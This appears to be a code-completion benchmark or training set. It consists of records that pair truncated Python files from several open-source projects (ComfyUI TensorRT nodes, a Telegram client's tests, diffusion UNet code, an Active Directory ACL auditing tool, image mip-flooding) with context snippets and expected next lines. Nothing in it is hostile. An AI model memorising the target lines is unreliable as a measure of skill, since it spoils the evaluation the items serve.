@route("/")
def index():
    """Serve the site root by rendering the index.html template."""
    return template("index.html")
@route("/static/<filename:path>")
def static(filename): | return static_file(filename, root="static") | 3 | 2023-10-29 12:19:46+00:00 | 4k |
phineas-pta/comfy-trt-test | comfy_trt/node_unet.py | [
{
"identifier": "TRT_MODEL_DIR",
"path": "comfy_trt/model_manager.py",
"snippet": "BASE_PATH = os.path.dirname(os.path.realpath(__file__))\nONNX_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-onnx\")\nTRT_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-trt\")\nMODEL_FILE = os.path.join(TRT_MODEL_DIR, \"model.jso... | import os
import torch
import comfy.supported_models as LIST_MODELS # used in eval() - do not remove
from torch.cuda import nvtx
from .model_manager import TRT_MODEL_DIR, modelmanager
from .utilities import Engine
from comfy.model_base import ModelType, model_sampling # ModelType used in eval() - do not remove
from comfy import model_management | 3,120 | # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"]
| # -*- coding: utf-8 -*-
# modified from https://github.com/NVIDIA/Stable-Diffusion-WebUI-TensorRT/blob/main/scripts/trt.py
# CHANGE: wrap TrtUnet to make comfy node
# STATUS: working but need clean vram to change model
# rabbit hole 0: original unet implementation
# - https://github.com/CompVis/stable-diffusion/blob/main/ldm/modules/diffusionmodules/openaimodel.py >>> UNetModel
# rabbit hole 1: a1111 unet loader
# - https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/dev/modules/sd_unet.py
# rabbit hole 2: comfy unet loader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/nodes.py >>> UNETLoader
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/sd.py >>> load_unet
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_patcher.py
# - https://github.com/comfyanonymous/ComfyUI/blob/master/comfy/model_base.py
LIST_ENGINES = modelmanager.available_models()
class TRT_Unet_Loader:
"""ComfyUI node"""
RETURN_TYPES = ("MODEL",)
CATEGORY = "advanced/loaders"
FUNCTION = "load_trt"
@classmethod
def INPUT_TYPES(cls):
return {"required": {
"engine_file": (list(LIST_ENGINES.keys()),),
################################################# test: convert directly in GUI
# "model" : ("MODEL",),
# "batch_min": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_opt": ("INT", {"default": 1, "min": 1, "max": 16}),
# "batch_max": ("INT", {"default": 1, "min": 1, "max": 16}),
# "height_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "height_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "width_min": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_opt": ("INT", {"default": 512, "min": 256, "max": 4096, "step": 64}),
# "width_max": ("INT", {"default": 768, "min": 256, "max": 4096, "step": 64}),
# "token_count_min": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_opt": ("INT", {"default": 75, "min": 75, "max": 750}),
# "token_count_max": ("INT", {"default": 75, "min": 75, "max": 750}),
# "force_export": ("BOOLEAN", {"default": False}),
# "static_shapes": ("BOOLEAN", {"default": False}),
# "use_float32": ("BOOLEAN", {"default": False}),
}}
def load_trt(self, engine_file: str) -> tuple:
configs: list = LIST_ENGINES[engine_file]
if configs[0]["config"].lora:
model_name = configs[0]["base_model"] | lora_path = os.path.join(TRT_MODEL_DIR, configs[0]["filepath"]) | 0 | 2023-10-25 23:58:12+00:00 | 4k |
hydrogram/hydrogram | tests/test_file_id.py | [
{
"identifier": "FileId",
"path": "hydrogram/file_id.py",
"snippet": "class FileId:\n MAJOR = 4\n MINOR = 30\n\n def __init__(\n self,\n *,\n major: int = MAJOR,\n minor: int = MINOR,\n file_type: FileType,\n dc_id: int,\n file_reference: bytes =... | import pytest
from hydrogram.file_id import FileId, FileType, FileUniqueId, FileUniqueType | 3,278 | # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
    """Round-trip *file_id*: decode it, verify its type, and assert a lossless re-encode."""
    parsed = FileId.decode(file_id)
    assert parsed.file_type == expected_file_type
    assert parsed.encode() == file_id
| # Hydrogram - Telegram MTProto API Client Library for Python
# Copyright (C) 2017-2023 Dan <https://github.com/delivrance>
# Copyright (C) 2023-present Hydrogram <https://hydrogram.org>
#
# This file is part of Hydrogram.
#
# Hydrogram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Hydrogram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
    """Decode *file_id*, confirm the expected file type, and verify encode() restores the input."""
    fid = FileId.decode(file_id)
    assert fid.file_type == expected_file_type
    assert fid.encode() == file_id
| def check_unique(file_unique_id: str, expected_file_unique_type: FileUniqueType): | 3 | 2023-10-29 16:16:37+00:00 | 4k |
iwatake2222/rotop | src/rotop/rotop.py | [
{
"identifier": "DataContainer",
"path": "src/rotop/data_container.py",
"snippet": "class DataContainer:\n MAX_ROW_CSV = 600\n MAX_NUM_HISTORY = 100\n\n def __init__(self, write_csv=False):\n now = datetime.datetime.now()\n if write_csv:\n self.csv_dir_name = now.strftime('./rotop_%Y%m%d_%... | import argparse
import curses
import time
from .data_container import DataContainer
from .top_runner import TopRunner
from .gui_main import gui_main
from .utility import create_logger
from ._version import version
from .version_dummy import version | 3,440 | # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| logger = create_logger(__name__, log_filename='rotop.log') | 3 | 2023-10-30 22:21:05+00:00 | 4k |
chenruduan/OAReactDiff | oa_reactdiff/dynamics/egnn_dynamics.py | [
{
"identifier": "EGNN",
"path": "oa_reactdiff/model/egnn.py",
"snippet": "class EGNN(nn.Module):\n def __init__(\n self,\n in_node_nf: int = 8,\n in_edge_nf: int = 2,\n hidden_nf: int = 256,\n edge_hidden_nf: int = 32,\n act_fn: str = \"swish\",\n n_la... | from typing import Dict, List, Optional, Tuple
from torch import nn, Tensor
from torch_scatter import scatter_mean
from oa_reactdiff.model import EGNN
from oa_reactdiff.utils._graph_tools import get_subgraph_mask
from ._base import BaseDynamics
import numpy as np
import torch | 3,293 |
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None,
|
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None, | model: nn.Module = EGNN, | 0 | 2023-10-30 02:53:38+00:00 | 4k |
lewandofskee/DiAD | ldm/modules/diffusionmodules/openaimodel.py | [
{
"identifier": "checkpoint",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def checkpoint(func, inputs, params, flag):\n \"\"\"\n Evaluate a function without caching intermediate activations, allowing for\n reduced memory at the expense of extra compute in the backward pass.\n ... | from abc import abstractmethod
from ldm.modules.diffusionmodules.util import (
checkpoint,
conv_nd,
linear,
avg_pool_nd,
zero_module,
normalization,
timestep_embedding,
)
from ldm.modules.attention import SpatialTransformer
from ldm.util import exists
from omegaconf.listconfig import ListConfig
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F | 3,310 | x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
)
else:
x = F.interpolate(x, scale_factor=2, mode="nearest")
# if self.scale_guide:
# x = F.interpolate(x, scale_factor=1.75, mode="nearest")
# else:
# x = F.interpolate(x, scale_factor=2, mode="nearest")
if self.use_conv:
x = self.conv(x)
return x
class TransposedUpsample(nn.Module):
    """Learned 2x upsampling without padding (single transposed convolution)."""

    def __init__(self, channels, out_channels=None, ks=5):
        super().__init__()
        self.channels = channels
        self.out_channels = out_channels or channels
        # stride=2 doubles the spatial dims; no padding, so ks-2 border rows/cols are added.
        self.up = nn.ConvTranspose2d(
            in_channels=self.channels,
            out_channels=self.out_channels,
            kernel_size=ks,
            stride=2,
        )

    def forward(self, x):
        return self.up(x)
class Downsample(nn.Module):
    """
    A downsampling layer with an optional convolution.
    :param channels: channels in the inputs and outputs.
    :param use_conv: a bool determining if a convolution is applied.
    :param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
        downsampling occurs in the inner-two dimensions.
    """

    def __init__(self, channels, use_conv, dims=2, out_channels=None,padding=1):
        super().__init__()
        self.channels = channels
        self.out_channels = out_channels or channels
        self.use_conv = use_conv
        self.dims = dims
        # 3D (video-like) inputs keep their first (temporal) extent; only the
        # inner two spatial dims are halved.
        stride = 2 if dims != 3 else (1, 2, 2)
        if use_conv:
            # Strided conv: learned downsampling, may also change channel count.
            self.op = conv_nd(
                dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
            )
        else:
            # Average pooling cannot change the channel count.
            assert self.channels == self.out_channels
            self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)

    def forward(self, x):
        # Guard against callers wiring the wrong feature map into this layer.
        assert x.shape[1] == self.channels
        return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout),
|
# dummy replace
def convert_module_to_f16(x):
    """No-op placeholder: fp16 conversion is intentionally disabled in this build."""
    pass
def convert_module_to_f32(x):
    """No-op placeholder: fp32 conversion is intentionally disabled in this build."""
    pass
## go
class AttentionPool2d(nn.Module):
    """
    Attention-based global pooling over a 2D feature map.
    Adapted from CLIP: https://github.com/openai/CLIP/blob/main/clip/model.py
    """

    def __init__(
        self,
        spacial_dim: int,
        embed_dim: int,
        num_heads_channels: int,
        output_dim: int = None,
    ):
        super().__init__()
        # One positional vector per spatial location plus one for the prepended
        # mean token; scaled by 1/sqrt(embed_dim) at init.
        self.positional_embedding = nn.Parameter(th.randn(embed_dim, spacial_dim ** 2 + 1) / embed_dim ** 0.5)
        # 1D convs act as per-token linear projections (QKV fused into one).
        self.qkv_proj = conv_nd(1, embed_dim, 3 * embed_dim, 1)
        self.c_proj = conv_nd(1, embed_dim, output_dim or embed_dim, 1)
        self.num_heads = embed_dim // num_heads_channels
        self.attention = QKVAttention(self.num_heads)

    def forward(self, x):
        b, c, *_spatial = x.shape
        x = x.reshape(b, c, -1)  # NC(HW): flatten spatial dims into tokens
        # Prepend the spatial mean as an extra "summary" token.
        x = th.cat([x.mean(dim=-1, keepdim=True), x], dim=-1)  # NC(HW+1)
        x = x + self.positional_embedding[None, :, :].to(x.dtype)  # NC(HW+1)
        x = self.qkv_proj(x)
        x = self.attention(x)
        x = self.c_proj(x)
        # Return only the attended mean token: one pooled vector per sample.
        return x[:, :, 0]
class TimestepBlock(nn.Module):
    """
    Any module where forward() takes timestep embeddings as a second argument.
    Used as a marker base class so containers can dispatch the embedding.
    """

    @abstractmethod
    def forward(self, x, emb):
        """
        Apply the module to `x` given `emb` timestep embeddings.
        """
class TimestepEmbedSequential(nn.Sequential, TimestepBlock):
    """
    A sequential container that forwards extra inputs to the children that
    accept them: timestep embeddings to TimestepBlocks and conditioning
    context to SpatialTransformers; all other children get `x` alone.
    """

    def forward(self, x, emb, context=None):
        for module in self:
            if isinstance(module, TimestepBlock):
                x = module(x, emb)
            elif isinstance(module, SpatialTransformer):
                x = module(x, context)
            else:
                x = module(x)
        return x
class Upsample(nn.Module):
    """
    An upsampling layer with an optional convolution.
    :param channels: channels in the inputs and outputs.
    :param use_conv: a bool determining if a convolution is applied.
    :param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
        upsampling occurs in the inner-two dimensions.
    :param scale_guide: currently unused except by the commented-out 1.75x
        branch below — NOTE(review): dead parameter, confirm before removing.
    """

    def __init__(self, channels, use_conv, dims=2, out_channels=None, padding=1, scale_guide=False):
        super().__init__()
        self.channels = channels
        self.out_channels = out_channels or channels
        self.use_conv = use_conv
        self.dims = dims
        self.scale_guide = scale_guide
        if use_conv:
            # Post-upsample conv to smooth nearest-neighbor artifacts and/or
            # change the channel count.
            self.conv = conv_nd(dims, self.channels, self.out_channels, 3, padding=padding)

    def forward(self, x):
        assert x.shape[1] == self.channels
        if self.dims == 3:
            # 3D: keep the first (temporal) extent, double the inner two dims.
            x = F.interpolate(
                x, (x.shape[2], x.shape[3] * 2, x.shape[4] * 2), mode="nearest"
            )
        else:
            x = F.interpolate(x, scale_factor=2, mode="nearest")
        # if self.scale_guide:
        #     x = F.interpolate(x, scale_factor=1.75, mode="nearest")
        # else:
        #     x = F.interpolate(x, scale_factor=2, mode="nearest")
        if self.use_conv:
            x = self.conv(x)
        return x
class TransposedUpsample(nn.Module):
    """Learned 2x upsampling without padding (single transposed convolution)."""

    def __init__(self, channels, out_channels=None, ks=5):
        super().__init__()
        self.channels = channels
        self.out_channels = out_channels or channels
        # stride=2 doubles the spatial dims; weights are learned, unlike interpolation.
        self.up = nn.ConvTranspose2d(self.channels,self.out_channels,kernel_size=ks,stride=2)

    def forward(self,x):
        return self.up(x)
class Downsample(nn.Module):
    """
    A downsampling layer with an optional convolution.
    :param channels: channels in the inputs and outputs.
    :param use_conv: a bool determining if a convolution is applied.
    :param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
        downsampling occurs in the inner-two dimensions.
    """

    def __init__(self, channels, use_conv, dims=2, out_channels=None, padding=1):
        super().__init__()
        self.channels = channels
        self.out_channels = out_channels or channels
        self.use_conv = use_conv
        self.dims = dims
        # 3D inputs keep their first (temporal) extent; only spatial dims are halved.
        stride = (1, 2, 2) if dims == 3 else 2
        if use_conv:
            # Learned, strided downsampling; may also change the channel count.
            self.op = conv_nd(
                dims, self.channels, self.out_channels, 3, stride=stride, padding=padding
            )
        else:
            # Average pooling preserves the channel count by construction.
            assert self.channels == self.out_channels
            self.op = avg_pool_nd(dims, kernel_size=stride, stride=stride)

    def forward(self, x):
        assert x.shape[1] == self.channels
        return self.op(x)
class ResBlock(TimestepBlock):
"""
A residual block that can optionally change the number of channels.
:param channels: the number of input channels.
:param emb_channels: the number of timestep embedding channels.
:param dropout: the rate of dropout.
:param out_channels: if specified, the number of out channels.
:param use_conv: if True and out_channels is specified, use a spatial
convolution instead of a smaller 1x1 convolution to change the
channels in the skip connection.
:param dims: determines if the signal is 1D, 2D, or 3D.
:param use_checkpoint: if True, use gradient checkpointing on this module.
:param up: if True, use this block for upsampling.
:param down: if True, use this block for downsampling.
"""
def __init__(
self,
channels,
emb_channels,
dropout,
out_channels=None,
use_conv=False,
use_scale_shift_norm=False,
dims=2,
use_checkpoint=False,
up=False,
down=False,
):
super().__init__()
self.channels = channels
self.emb_channels = emb_channels
self.dropout = dropout
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.use_checkpoint = use_checkpoint
self.use_scale_shift_norm = use_scale_shift_norm
self.in_layers = nn.Sequential(
normalization(channels),
nn.SiLU(),
conv_nd(dims, channels, self.out_channels, 3, padding=1),
)
self.updown = up or down
if up:
self.h_upd = Upsample(channels, False, dims)
self.x_upd = Upsample(channels, False, dims)
elif down:
self.h_upd = Downsample(channels, False, dims)
self.x_upd = Downsample(channels, False, dims)
else:
self.h_upd = self.x_upd = nn.Identity()
self.emb_layers = nn.Sequential(
nn.SiLU(),
linear(
emb_channels,
2 * self.out_channels if use_scale_shift_norm else self.out_channels,
),
)
self.out_layers = nn.Sequential(
normalization(self.out_channels),
nn.SiLU(),
nn.Dropout(p=dropout), | zero_module( | 4 | 2023-10-30 14:21:09+00:00 | 4k |
nv-tlabs/trace | tbsim/datasets/factory.py | [
{
"identifier": "translate_pass_trajdata_cfg",
"path": "tbsim/utils/config_utils.py",
"snippet": "def translate_pass_trajdata_cfg(cfg: ExperimentConfig):\n \"\"\"\n Translate a unified passthrough config to trajdata.\n \"\"\"\n rcfg = Dict()\n rcfg.step_time = cfg.algo.step_time\n rcfg... | from tbsim.utils.config_utils import translate_pass_trajdata_cfg
from tbsim.datasets.trajdata_datamodules import PassUnifiedDataModule | 1,604 | """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"):
| """DataModule / Dataset factory"""
def datamodule_factory(cls_name: str, config):
"""
A factory for creating pl.DataModule.
Args:
cls_name (str): name of the datamodule class
config (Config): an Experiment config object
**kwargs: any other kwargs needed by the datamodule
Returns:
A DataModule
"""
if cls_name.startswith("PassUnified"): | trajdata_config = translate_pass_trajdata_cfg(config) | 0 | 2023-10-31 18:43:07+00:00 | 4k |
AetherBlack/abuseACL | abuseACL/network/LDAP.py | [
{
"identifier": "sAMAccountType",
"path": "abuseACL/structures/sAMAccountType.py",
"snippet": "class sAMAccountType:\n\n SAM_DOMAIN_OBJECT = 0x0\n SAM_GROUP_OBJECT = 0x10000000\n SAM_NON_SECURITY_GROUP_OBJECT = 0x10000001\n SAM_ALIAS_OBJECT = 0x20000000\n SAM_NON_SECURITY_ALIAS_OBJECT = 0... | from typing import List
from abuseACL.structures.sAMAccountType import sAMAccountType
from abuseACL.structures.Credentials import Credentials
from abuseACL.structures.Target import Target
from abuseACL.structures.ADObject.ADCertificateTemplate import ADCertificateTemplate
from abuseACL.structures.ADObject.ADAdminSDHolder import ADAdminSDHolder
from abuseACL.structures.ADObject.ADComputer import ADComputer
from abuseACL.structures.ADObject.ADSchema import ADSchema
from abuseACL.structures.ADObject.ADGroup import ADGroup
from abuseACL.structures.ADObject.ADUser import ADUser
from abuseACL.structures.ADObject.ADgMSA import ADgMSA
from abuseACL.structures.ADObject.ADGPO import ADGPO
from abuseACL.structures.ADObject.ADOU import ADOU
from abuseACL.network.Kerberos import Kerberos
from abuseACL.core.Logger import Logger
import ssl as tls
import ldap3 | 3,501 |
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
|
class LDAP:
users = list()
groups = list()
computers = list()
certificatesTemplates = list()
gpos = list()
ous = list()
adminSDHolder = list()
schema = list()
gMSA = list()
| def __init__(self, forest: str, target: Target, credentials: Credentials, logger: Logger) -> None: | 13 | 2023-10-30 21:19:24+00:00 | 4k |
gydpku/PPTC | src/modeling.py | [
{
"identifier": "ppt_executor",
"path": "src/ppt_executor.py",
"snippet": "SLIDE_HEIGHT = 6858000\nSLIDE_WIDTH = 9144000\nCENTER_TOP = 3429000\nCENTER_LEFT = 4572000\nSHAPE_HEIGHT = 900000\nSHAPE_WIDTH = 900000\nTABLE_HEIGHT = 370000 # per line\nCONTENT_HEIGHT = 4351338\nCONTENT_WIDTH = 7886700\nCONTENT... | from src import ppt_executor, ppt_reader, openai_api, prompt_factor, dataset, api_selection, utils, api_doc | 1,944 |
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt):
|
class PPT_assistant(object):
def __init__(self, args=None):
self.chat_history = []
self.args = args
self.planning = args.planning
self.api_selection = args.api_selection
self.content_selection = args.content_selection
self.model = args.model
self.model_id=args.model_id
self.ppt = None
self.current_page_id = 0
self.prompt = ""
def planner(self, instruction):
if not self.planning:
return [instruction]
else:
print('Planning...')
planning_prompt = prompt_factor.query_decomposition_prompt.format(instruction)
self.prompt += planning_prompt + "\n\n"
planning_reply = openai_api.query_azure_openai(planning_prompt, model=self.model).strip()
decomposed = planning_reply.split('\n')
decomposed = [d.replace('</d>','') for d in decomposed if (d != '</d>') and (d != '<d>')]
print(f"{instruction}->{decomposed}")
return decomposed
def api_selector(self, instruction):
if not self.api_selection:
all_apis = api_selection.get_all_apis(self.args)
return all_apis
else:
selected_apis = api_selection.get_selected_apis(instruction, self.args)
print('Selecting APIs...')
print([x.name for x in selected_apis])
return selected_apis
def content_selector(self, ppt_path, instruction, args, ppt): | content, prompt = ppt_reader.get_content_by_instructions(ppt_path, instruction, args, ppt) | 1 | 2023-10-25 13:14:46+00:00 | 4k |
secarri/MipFlooding | mipflooding/image_processing.py | [
{
"identifier": "setup_logger",
"path": "mipflooding/logger.py",
"snippet": "def setup_logger(logger_name: str, abs_log_path: str) -> logging.Logger:\n \"\"\"Set up a logger with the specified name and log to the given absolute path, returning the logger instance.\"\"\"\n logger = logging.getLogge... | import logging
import math
import os
import time
from pathlib import Path
from typing import List, Optional
from PIL import Image
from .logger import setup_logger, terminate_loggers
from .file_utils import clear_log_file, get_output_directory, get_output_filename | 1,829 |
# From self package
def _open_image_inputs(color: str, alpha: str, logger: logging.Logger) -> List:
    """Open the color and alpha inputs, returning ``[color_map, alpha_mask]``.

    Either entry is ``None`` when its path is falsy or does not exist on disk.
    The alpha image is converted to single-channel ("L") grayscale so it can be
    used directly as a mask. Logs the color file's on-disk size when present.
    """
    logger.info("--- Opening images in memory...")
    # Short-circuit on falsy paths (None / "") before touching the filesystem;
    # this replaces the old `color = str(None)` placeholder-path trick.
    color_map = Image.open(color) if color and Path(color).exists() else None
    alpha_mask = Image.open(alpha).convert('L') if alpha and Path(alpha).exists() else None
    if color_map is not None:
        logger.info(f"--- File disk size: {os.path.getsize(color) / float(1 << 20):,.2f} MB")
    return [color_map, alpha_mask]
def _validate_inputs(color: Image, alpha_mask: Image, logger: logging.Logger,
                     input_texture_color_abs_path: str) -> Optional[str]:
    """Validate the opened inputs; return an error message, or None when valid."""
    if color is None or alpha_mask is None:
        # NOTE(review): this interpolates the Image objects (or None), not the
        # input paths — presumably intentional for a quick None diagnostic.
        message = f"One or more inputs do not exist:\n\t-Color: {color}\n\t-Alpha: {alpha_mask}. Skipping..."
    elif not _do_resolutions_match(color, alpha_mask, logger):
        message = f"Inputs do not match in resolution for file: {input_texture_color_abs_path}. Skipping..."
    elif not _is_power_of_two_image(color, logger):
        message = f"Input is not a power of two image: {input_texture_color_abs_path}. Skipping..."
    else:
        # All checks passed: no message means the inputs are usable.
        message = None
    return message
def _do_resolutions_match(color: Image, alpha: Image, logger: logging.Logger) -> bool:
    """Return True when the color and alpha images have identical (width, height)."""
    logger.info("--- Verifying that inputs resolutions do match ...")
    # Tuple equality already yields a bool; no `True if ... else False` needed.
    return color.size == alpha.size
def _is_power_of_two_image(color: Image, logger: logging.Logger) -> bool:
    """Return True when every dimension of *color* is a power of two."""
    logger.info("--- Verifying that inputs are power of two images ...")
    # n & (n - 1) clears the lowest set bit; the result is 0 only for powers
    # of two (image dimensions are always positive, so 0 is not a concern).
    return all((res & (res - 1)) == 0 for res in color.size)
def _get_mip_levels(image: "Image.Image", logger: logging.Logger) -> int:
    """Return the number of mip levels: log2 of the image's shorter side.

    The caller has already verified power-of-two dimensions, so the log2 of
    the short side is (up to float rounding) an integer.
    """
    logger.info("--- Calculating mip map levels...")
    # min() replaces the manual short-side ternary; compute log2 once instead
    # of once for the log message and once more for the return value.
    mip_levels = round(math.log2(min(image.size)))
    logger.info(f"--- Done. Miplevels: {mip_levels}")
    return mip_levels
def _generate_background(image: Image, logger: logging.Logger) -> Image:
    """Generate a background image and returns the result Image object."""
    logger.info("--- Generating background image and storing it in memory...")
    # Resizing to 1x1 collapses every pixel into the image's average color...
    average_image_color = image.resize((1, 1))
    # ...which is then scaled back to full size with NEAREST, yielding a flat
    # background of that single average color.
